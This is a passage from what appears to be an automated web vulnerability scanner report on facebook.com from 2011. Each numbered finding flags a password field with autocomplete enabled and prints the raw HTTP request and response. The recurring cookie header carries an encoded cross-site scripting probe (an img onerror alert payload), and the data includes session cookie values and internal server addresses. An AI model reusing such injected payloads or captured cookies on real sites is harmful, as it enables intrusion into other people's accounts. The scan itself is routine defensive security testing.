Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.105.45
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 74561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.32. http://www.facebook.com/kimberly.christ

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /kimberly.christ

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /kimberly.christ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.29
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 75242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.33. http://www.facebook.com/ladonna.lokey

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ladonna.lokey

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /ladonna.lokey HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.75
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 68300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.34. http://www.facebook.com/lakendra.roberts

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /lakendra.roberts

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /lakendra.roberts HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.33
Connection: close
Date: Thu, 05 May 2011 11:42:24 GMT
Content-Length: 82530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.35. http://www.facebook.com/login.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; act=1304613664644%2F2; next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; next_path=%2Fmobile%2F%3Fsettings

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 11:43:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.37.19.117
X-Cnection: close
Date: Thu, 05 May 2011 11:43:56 GMT
Content-Length: 16254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="login_form_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
...[SNIP]...

12.36. http://www.facebook.com/matthew.oliveira2

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /matthew.oliveira2

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /matthew.oliveira2 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.47
Connection: close
Date: Thu, 05 May 2011 11:42:11 GMT
Content-Length: 62437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.37. http://www.facebook.com/mmafighting

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mmafighting

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /mmafighting HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.164.73
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 198589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.38. http://www.facebook.com/mobile/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; act=1304613659940%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613659942%2C%22act%22%2C1304613659940%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmobile%2F%3Fref%3Dpf%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C469%2C478%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.25
X-Cnection: close
Date: Thu, 05 May 2011 11:41:04 GMT
Content-Length: 17082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.39. http://www.facebook.com/pages/Barnesville/115038011847083

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Barnesville/115038011847083

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/Barnesville/115038011847083 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.47
Connection: close
Date: Thu, 05 May 2011 11:41:58 GMT
Content-Length: 26916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.40. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Beacon-of-Hope-Resource-Center/34194116820

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/Beacon-of-Hope-Resource-Center/34194116820 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.43
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 129142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.41. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Bernicks-Pepsi/123296084349478

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/Bernicks-Pepsi/123296084349478 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.103.35
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 26965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.42. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Blaine-Senior-High/106189406087059

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/Blaine-Senior-High/106189406087059 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.138.81
Connection: close
Date: Thu, 05 May 2011 11:42:01 GMT
Content-Length: 26986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.43. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Editor-in-Chief/137829579583400

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/Editor-in-Chief/137829579583400 HTTP/1.1
